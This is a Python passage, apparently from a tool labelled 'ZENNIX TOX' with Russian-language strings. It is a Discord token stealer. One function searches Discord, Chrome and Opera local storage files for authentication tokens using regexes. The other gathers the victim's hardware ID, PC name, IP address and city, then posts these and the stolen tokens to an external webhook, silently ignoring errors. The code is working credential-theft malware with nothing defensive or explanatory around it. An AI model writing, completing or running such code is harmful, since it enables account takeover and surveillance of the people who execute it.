import re, glob, sqlite3
from shutil import copyfile

def get_discord_token():
    tokens = []
    paths = [
        os.getenv("APPDATA") + "\\discord\\Local Storage\\leveldb",
        os.getenv("APPDATA") + "\\discordcanary\\Local Storage\\leveldb",
        os.getenv("APPDATA") + "\\discordptb\\Local Storage\\leveldb",
        os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb",
        os.getenv("APPDATA") + "\\Opera Software\\Opera Stable\\Local Storage\\leveldb",
    ]
    for path in paths:
        if not os.path.exists(path): continue
        for file in glob.glob(path + "\\*.ldb") + glob.glob(path + "\\*.log") + glob.glob(path + "\\*.sqlite"):
            try:
                with open(file, "rb") as f:
                    for line in f.read().decode(errors="ignore").splitlines():
                        for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
                            for token in re.findall(regex, line):
                                if token not in tokens:
                                    tokens.append(token)
            except: pass
    return tokens if tokens else ["Нет токена"]

def send_webhook(username):
    try:
        hwid = str(uuid.UUID(int=uuid.getnode()))
        pc_name = platform.node()
        ip_info = requests.get("http://ip-api.com/json/", timeout=5).json()
        ip = ip_info.get("query", "Неизвестно")
        location = f"{ip_info.get('city','?')}, {ip_info.get('country','?')}"
        tokens = get_discord_token()
        token_field = "\n".join([f"`{t}`" for t in tokens[:5]])  # до 5 токенов (чтобы не спамить)
        
        data = {
            "embeds": [{
                "title": "ZENNIX TOX — ЗАПУСК + DISCORD TOKEN",
                "color": 16711680,
                "fields": [
                    {"name": "Логин", "value": username, "inline": True},
                    {"name": "PC", "value": pc_name, "inline": True},
                    {"name": "HWID", "value": f"```{hwid}```", "inline": False},
                    {"name": "IP", "value": ip, "inline": True},
                    {"name": "Город", "value": location, "inline": True},
                    {"name": "Discord токены", "value": token_field if token_field != "`Нет токена`" else "Не найдено", "inline": False},
                    {"name": "Время", "value": datetime.now().strftime("%d.%m.%Y %H:%M:%S"), "inline": False}
                ]
            }]
        }
        requests.post(WEBHOOK_URL, json=data)
    except: pass
